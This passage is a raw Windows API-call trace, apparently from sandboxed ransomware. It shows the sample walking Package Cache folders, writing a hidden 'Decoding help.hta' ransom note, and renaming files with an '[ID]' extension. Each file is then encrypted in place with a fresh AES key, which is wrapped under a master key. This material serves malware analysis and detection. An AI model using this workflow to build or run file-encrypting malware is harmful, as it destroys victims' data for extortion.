lpString1=0x11173c18, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" [0043.350] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned 75 [0043.350] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" [0043.350] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\decoding help.hta")) returned 0xffffffff [0043.350] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x704 [0043.390] WriteFile (in: hFile=0x704, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1845fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1845fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.391] CloseHandle (hObject=0x704) returned 1 [0043.392] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.392] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm") returned -1 [0043.392] lstrlenW (lpString="state.rsm") returned 9 [0043.392] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" [0043.392] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned 75 [0043.392] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpString2="state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" [0043.392] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" [0043.392] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" [0043.392] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.416] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x704 [0043.416] CreateFileMappingA (hFile=0x704, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x394 [0043.416] CryptAcquireContextA (in: phProv=0x1845fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1845fcec*=0x3448fa0) returned 1 [0043.417] CryptGenKey (in: hProv=0x3448fa0, Algid=0x6610, dwFlags=0x1, phKey=0x1845fce8 | out: phKey=0x1845fce8*=0x671d30) returned 1 [0043.417] CryptExportKey (in: hKey=0x671d30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1845fbe4, pdwDataLen=0x1845fce4 | out: pbData=0x1845fbe4*, pdwDataLen=0x1845fce4*=0x2c) returned 1 [0043.417] MapViewOfFile (hFileMappingObject=0x394, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x280) returned 0xde40000 [0043.427] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1845fbe4*, pdwDataLen=0x1845fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1845fbe4*, pdwDataLen=0x1845fcf8*=0x100) returned 1 [0043.428] CryptEncrypt (in: hKey=0x671d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xde40000*, pdwDataLen=0x1845fce4*=0x280, dwBufLen=0x280 | out: pbData=0xde40000*, pdwDataLen=0x1845fce4*=0x280) returned 1 [0043.428] UnmapViewOfFile (lpBaseAddress=0xde40000) returned 1 [0043.429] CloseHandle (hObject=0x394) returned 1 [0043.429] CryptDestroyKey (hKey=0x671d30) returned 1 [0043.429] CryptReleaseContext (hProv=0x3448fa0, dwFlags=0x0) returned 1 [0043.429] SetFilePointerEx (in: hFile=0x704, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.429] WriteFile (in: hFile=0x704, lpBuffer=0x1845fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1845fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1845fbe4*, lpNumberOfBytesWritten=0x1845fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.430] WriteFile (in: hFile=0x704, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1845fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1845fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.430] CloseHandle (hObject=0x704) returned 1 [0043.431] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.431] FindNextFileW (in: hFindFile=0x671bb0, lpFindFileData=0x1845fd30 | out: lpFindFileData=0x1845fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xca64c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xfe5c3760, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0043.431] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" [0043.431] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned 75 [0043.431] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" [0043.431] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\decoding help.hta")) returned 0x1 [0043.432] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vcredist_x86.exe") returned -1 [0043.432] lstrlenW (lpString="vcredist_x86.exe") returned 16 [0043.432] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" [0043.432] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned 75 [0043.432] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpString2="vcredist_x86.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" [0043.432] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" [0043.432] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0043.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.448] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0043.448] CreateFileMappingA (hFile=0x380, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6a4 [0043.448] CryptAcquireContextA (in: phProv=0x1845fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1845fcec*=0x3448f18) returned 1 [0043.449] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0x1845fce8 | out: phKey=0x1845fce8*=0x671b70) returned 1 [0043.449] CryptExportKey (in: hKey=0x671b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1845fbe4, pdwDataLen=0x1845fce4 | out: pbData=0x1845fbe4*, pdwDataLen=0x1845fce4*=0x2c) returned 1 [0043.449] MapViewOfFile (hFileMappingObject=0x6a4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x71080) returned 0x4420000 [0043.464] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1845fbe4*, pdwDataLen=0x1845fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1845fbe4*, pdwDataLen=0x1845fcf8*=0x100) returned 1 [0043.464] CryptEncrypt (in: hKey=0x671b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4420000, pdwDataLen=0x1845fce4*=0x71080, dwBufLen=0x71080 | out: pbData=0x4420000*, pdwDataLen=0x1845fce4*=0x71080) returned 1 [0044.072] UnmapViewOfFile (lpBaseAddress=0x4420000) returned 1 [0044.078] CloseHandle (hObject=0x6a4) returned 1 [0044.078] CryptDestroyKey (hKey=0x671b70) returned 1 [0044.078] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0044.078] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.078] WriteFile (in: hFile=0x380, lpBuffer=0x1845fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1845fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1845fbe4*, lpNumberOfBytesWritten=0x1845fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.079] WriteFile (in: hFile=0x380, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1845fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1845fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.079] CloseHandle (hObject=0x380) returned 1 [0044.084] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.084] FindNextFileW (in: hFindFile=0x671bb0, lpFindFileData=0x1845fd30 | out: lpFindFileData=0x1845fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xca64c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xfe5c3760, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0044.084] FindClose (in: hFindFile=0x671bb0 | out: hFindFile=0x671bb0) returned 1 Thread: id = 377 os_tid = 0xaac [0043.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*", lpFindFileData=0x1859fd30 | out: lpFindFileData=0x1859fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719b0 [0043.340] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.340] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x1859fd30 | out: lpFindFileData=0x1859fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.340] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.340] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.340] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x1859fd30 | out: lpFindFileData=0x1859fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93efac0, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x6601040, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0043.340] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" [0043.340] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned 75 [0043.340] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" [0043.340] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\decoding help.hta")) returned 0xffffffff [0043.340] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x728 [0043.353] WriteFile (in: hFile=0x728, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1859fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1859fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.354] CloseHandle (hObject=0x728) returned 1 [0043.355] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.355] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm") returned -1 [0043.355] lstrlenW (lpString="state.rsm") returned 9 [0043.355] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" [0043.355] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned 75 [0043.355] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpString2="state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" [0043.355] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" [0043.355] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" [0043.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.356] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x728 [0043.356] CreateFileMappingA (hFile=0x728, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x72c [0043.356] CryptAcquireContextA (in: phProv=0x1859fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1859fcec*=0x3448c70) returned 1 [0043.357] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x1859fce8 | out: phKey=0x1859fce8*=0x671c30) returned 1 [0043.357] CryptExportKey (in: hKey=0x671c30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1859fbe4, pdwDataLen=0x1859fce4 | out: pbData=0x1859fbe4*, pdwDataLen=0x1859fce4*=0x2c) returned 1 [0043.357] MapViewOfFile (hFileMappingObject=0x72c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2e0) returned 0xde30000 [0043.378] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1859fbe4*, pdwDataLen=0x1859fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1859fbe4*, pdwDataLen=0x1859fcf8*=0x100) returned 1 [0043.378] CryptEncrypt (in: hKey=0x671c30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xde30000*, pdwDataLen=0x1859fce4*=0x2e0, dwBufLen=0x2e0 | out: pbData=0xde30000*, pdwDataLen=0x1859fce4*=0x2e0) returned 1 [0043.378] UnmapViewOfFile (lpBaseAddress=0xde30000) returned 1 [0043.380] CloseHandle (hObject=0x72c) returned 1 [0043.380] CryptDestroyKey (hKey=0x671c30) returned 1 [0043.380] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0043.380] SetFilePointerEx (in: hFile=0x728, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.380] WriteFile (in: hFile=0x728, lpBuffer=0x1859fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1859fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1859fbe4*, lpNumberOfBytesWritten=0x1859fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.381] WriteFile (in: hFile=0x728, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1859fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1859fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.381] CloseHandle (hObject=0x728) returned 1 [0043.381] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.382] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x1859fd30 | out: lpFindFileData=0x1859fd30*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93c9960, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xedfa2720, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0xbee30, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0043.382] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package 